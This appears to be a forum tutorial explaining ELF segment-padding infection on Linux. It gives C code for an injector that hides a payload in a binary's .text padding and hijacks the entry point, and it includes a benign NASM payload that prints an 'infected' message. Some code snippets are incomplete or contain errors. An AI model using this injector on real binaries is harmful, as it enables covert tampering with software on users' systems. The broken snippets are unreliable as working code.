As it doesn't look that @dtm is going to cover linux stuff, I have wrote a quick and dirty version of the great PE File Infector paper from @dtm but targeting ELF binaries specifically under GNU/Linux systems.
The process I will describe is slightly different from the one explained in the PE counterpart, so you will get a different view of the process and hopefully that will help you to better understand how do these things work. Moreover, it does not feel right to just write the same thing even if it is targeting to a different system.
So, let's start.
If you had read the "PE File Infector" paper in this site, you should already know what a code cave is. If you do not know that, go and read it, right now.
In the Linux world, you will find references to this technique as Segment padding infection. It is basically the same thing, I'm saing just in case you want to look for further information.
The infection technique we are going to implement is as follow:
- Find the padding area between the
.text segment and the next segment in the program (that is usually
- Append the payload code to the end of the
.text segment (in that padding area)
- Patch the ELF binary to run the injected coded at start up (modify the ELF entry point)
- Patch the payload to return execution to the original ELF entry point
The technique takes advantage of the padding areas in the segments. This, basically happen because the operating system works with a Page granularity. It is related to the processor memory management unit, but that is a bit out of scope. So, in general, there is an unused area at the end of the
.text segment. The size of that area depends on the size of the code, and may even not exist or just be a couple of bytes. For that reason, this technique may not work with some programs.
The main advantage of this technique is that the file size and the overall ELF data structures are not modified at all (with the exception of the application entry point).
Writing an Infector
The ELF code injector is pretty straightforward. The main function is a bit long, so I will divide it in smaller functional blocks in the hope that it will be easier to follow.
You can find the whole source code at github.
Opening the target ELF File
The first thing the main function does (after a quick check of the number of parameters) is to open the target ELF File. The code looks like this:
main (int argc, char *argv)
void *d, *d1;
int target_fd, payload_fd;
int fsize, fsize1;
printf ("Segment Padding Infector for 0x00sec\nby pico\n\n");
if (argc != 3)
fprintf (stderr, "Usage:\n %s elf_file payload\n", argv);
/* Open and map target ELF and payload */
target_fd = elfi_open_and_map (argv, &d, &fsize);
payload_fd = elfi_open_and_map (argv, &d1, &fsize1);
OK, there is not much to say about this, the main function opens and maps the target ELF to inject our code into and the code to be injected... let's continue looking into the
elfi_open_and_map (char *fname, void **data, int *len)
if ((fd = open (fname, O_APPEND | O_RDWR, 0)) < 0)
size = get_file_size (fd);
if ((*data = mmap (0, size, PROT_READ| PROT_WRITE| PROT_EXEC,
MAP_SHARED, fd, 0)) == MAP_FAILED)
printf ("+ File mapped (%d bytes ) at %p\n", size, data);
*len = size;
This function does three things:
- It open the file using
- Then it uses a utility function called
get_file_size to find out the size of the file. We need this information for the last step. The
get_file_size function just calls
fstab (I will not include it here as it is not really interesting)
- It memory maps the file. This means that we can access the file as if it were in memory (using pointers), but we are actually modifying the file in disk. So, this is a very convenient way of patching a file
The function returns the file descriptor and uses to output parameters to return the pointer to the memory mapped area (that is the beginning of our file) and its size.
Now that we have access to our files, we will store some information:
/* Get Application Entry point */
elf_hdr = (Elf64_Ehdr *) d;
ep = elf_hdr->e_entry;
printf ("+ Target Entry point: %p\n", (void*) ep);
As we said, the pointer returned by
elfi_open_and_map points to the actual content of the file. For an ELF file, the first thing we find is the ELF header. Take a look to the specs to find out the information kept by this structure.
Right now, we are interested in the application entry point. That is the address where program will start its execution. Think about it as the memory address for the
main function... It is not that easy, but for our current discussion such a definition should be OK.
Finding a gap
Now we have to find a gap in the target file. We had wrote a function to do that, which we call from the
Elf64_Phdr *t_text_seg = elfi_find_gap (d, fsize, &p, &len);
Elf64_Addr *base = t_text_seg->p_vaddr;
elfi_find_gap function will go through all the ELF segments and try to find the gap in the one that holds the code. It returns a pointer to the ELF segment structure that we will use later. It also returns the offset in the file to the gap and its size, using a couple of output parameters
After finding the code segment, we will also store the memory address where that code will be loaded. This is usually 0x400000, but it may be different on some applications.
elfi_find_gap function looks like this:
elfi_find_gap (void *d, int fsize, int *p, int *len)
Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) d;
Elf64_Phdr* elf_seg, *text_seg;
int n_seg = elf_hdr->e_phnum;
int text_end, gap=fsize;
elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_hdr
+ (unsigned int) elf_hdr->e_phoff);
for (i = 0; i < n_seg; i++)
if (elf_seg->p_type == PT_LOAD && elf_seg->p_flags & 0x011)
printf ("+ Found .text segment (#%d)\n", i);
text_seg = elf_seg;
text_end = elf_seg->p_offset + elf_seg->p_filesz;
if (elf_seg->p_type == PT_LOAD &&
(elf_seg->p_offset - text_end) < gap)
printf (" * Found LOAD segment (#%d) close to .text (offset: 0x%x)\n",
i, (unsigned int)elf_seg->p_offset);
gap = elf_seg->p_offset - text_end;
elf_seg = (Elf64_Phdr *) ((unsigned char*) elf_seg
+ (unsigned int) elf_hdr->e_phentsize);
*p = text_end;
*len = gap;
printf ("+ .text segment gap at offset 0x%x(0x%x bytes available)\n", text_end, gap);
Once again, we first access the ELF header to figure out where, within the file, the segment information is stored. It actually is at the offset specified by the header's field
e_phoff. With all this information, we can start checking the segments.
First we look for a segment of type
PT_LOAD with execution permissions. Normally there is only one, and it is the one containing the
.text section, and therefore the application code. When we find it, we store the pointer to the segment structure (to return it later) and the offset to the actual end of the section in the file.
Then we keep looking for
PT_LOAD segments and we calculate the gap with respect to the current executable segment we have already found, and we store the one with the smallest gap.
This function probably can be heavily improved. Normally there are only two PT_LOAD segment and they one after the other in the file. I was not sure if it is possible to get those segments out of order in the file (in theory should be possible) so that is why the function is a bit complex.
PT_LOAD segments are those that are directly loaded from the file. Other segments like the ones containing the stack or the .bss section are not stored in the file, but the code and static data have to be there and the
PT_LOAD type is the way the system knows that the data in the file has to be loaded in memory.
We have to stop for a sec, looking to our infector code and take a look to the payload we are going to use and how to get it into memory. We had just write a simple payload that prints a message in the console. I know that is not very impressive, but this is already becoming a bit long and complex howto.
So, our payload looks like this:
mov rax,1 ;  - sys_write
mov rdi,1 ; 0 = stdin / 1 = stdout / 2 = stderr
lea rsi,[rel msg] ; pointer(mem address) to msg (*char)
mov rdx, msg_end - msg ; msg size
syscall ; calls the function stored in rax
mov rax, 0x11111111
msg db 'This file has been infected for 0x00SEC',0x0a,0
msg_end db 0x0
It is the classical
Hello World assembler program, but, just after printing the message, it will jump back to somewhere. The 0x11111111 is a mark where we will have to write the original ELF access point, to let the original application run normally.
As usual, we can compile this small program with:
nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o
And we are done to get back to our ELF injector.
Processing the payload
You could just use some external tool to produce an hex dump of the payload code. Check @unh0lys0da shellcode tutorial for details. In this case, as we are playing with the ELF format, we are going to directly use the binary produced by nasm.
The way we used to compile our payload, was actually producing a ELF file. If you recall the beginning of the paper we had already opened the payload and mapped it on memory. Now we just need to find out where the actual code is, and copy it in the
.text segment gap of the target program we have found before.
This is what the code below does:
Elf63_Shdr *p_text_sec = elfi_find_section (d1, ".text");
printf ("+ Payload .text section found at %lx (%lx bytes)\n",
if (p_text_sec->sh_size > len)
fprintf (stderr, "- Payload to big, cannot infect file.\n");
/* Copy payload in the segment padding area */
memmove (d + p, d1 + p_text_sec->sh_offset, p_text_sec->sh_size);
First we call a function (that we will describe in a sec) to find out where the
.text section is, and therefore where the payload code is. The function returns a pointer to an ELF section structure that contains all the information we need.
Then we have to check if the size of the
.text section of the payload (our code) fits in the gap we had previously found, and finally we just copy the payload code into the target file just at the end of the executable segment. Using the pointer returned by
Finding a Section in an ELF File
So, we have to take a look to the
elfi_find_section function. Here it is
elfi_find_section (void *data, char *name)
Elf64_Ehdr* elf_hdr = (Elf64_Ehdr *) data;
Elf64_Shdr *shdr = (Elf64_Shdr *)(data + elf_hdr->e_shoff);
Elf64_Shdr *sh_strtab = &shdr[elf_hdr->e_shstrndx];
const char *const sh_strtab_p = data + sh_strtab->sh_offset;
printf ("+ %d section in file. Looking for section '%s'\n",
for (i = 0; i < elf_hdr->e_shnum; i++)
sname = (char*) (sh_strtab_p + shdr[i].sh_name);
if (!strcmp (sname, name)) return &shdr[i];
In order to find a section by name, we have to access to the symbol table in the ELF file. That table stores all the symbols required by the executable. Section names, external libraries, relocation symbols names,... Everything that is a human readable string.
The section list in the ELF file stores the section name as an index in the symbol table. So, despite of all that pointer gymnastics, the function is just looping through the section list, retrieving the name using the information there, and comparing that string with the passed parameter.
Just open the ELF spec, and start following the data structures. It's just tedious but not difficult.
Patching Entry Points
So, we are almost done. Now we just need to patch the entry points. This is done with the following code in the
/* Patch return address */
elfi_mem_subst (d+p, p_text_sec->sh_size, 0x11111111, (long)ep);
/* Patch entry point */
elf_hdr->e_entry = (Elf64_Addr) (base + p);
/* Close files and actually update target file */
elfi_mem_subst function just looks for the sequence
0x11111111 (do you remember it in our payload?), and substitutes it with the original ELF entry point. This will start the target application just after running our payload.
Then, for the main entry point, we just use our ELF Header pointer and write there the address for our payload, so it gets executed when the application is executed. We calculate the payload address as the base address we have got from the execution segment plus the offset to the segment gap we found at the beginning.
Once we are done, we just close the files to make sure that all the changes we made in the memory mapped area, make it to the file.
Just for completeness, let's take a look to
elfi_mem_subst (void *m, int len, long pat, long val)
unsigned char *p = (unsigned char*)m;
int i, r;
for (i = 0; i < len; i++)
v = *((long*)(p+i));
r = v ^pat;
if (r ==0)
printf ("+ Pattern %lx found at offset %d -> %lx\n", pat, i, val);
*((long*)(p+i)) = val;
Nothing special, we just scan the payload byte by byte to find our mark. When found, it is substituted by the value passed as a parameter (in this case the original entry point).
Using the injector
So, compile the application and generate your payload
$ make elf_injector
$ nasm -f elf64 -o payload.o payload.asm;ld -o payload payload.o
An then just start injecting your payload:
$ ./elf_inject xeyes payload
I had tried the program with some binaries in my system. I have to say that it had failed with some, and I do not know yet the reason. Some of the ones I successfully used were: xeyes, vim, lynx...
It failed with evince, for instance... So, lucky you, it is not perfect, and you have something to look at and play with :)... Have ELFun!
If you are planning to look further into this topic (you should, it is really interesting), it would be a good idea to install the
readelf for easily inspect your ELF files.
Also make sure that
xxd is available to do hex dump and check that you are dumping data in the right place.
I have wrote this pretty quickly so it may not be the most comprehensive howto and some parts may be hard to follow. Let me know in the comments if something needs improvement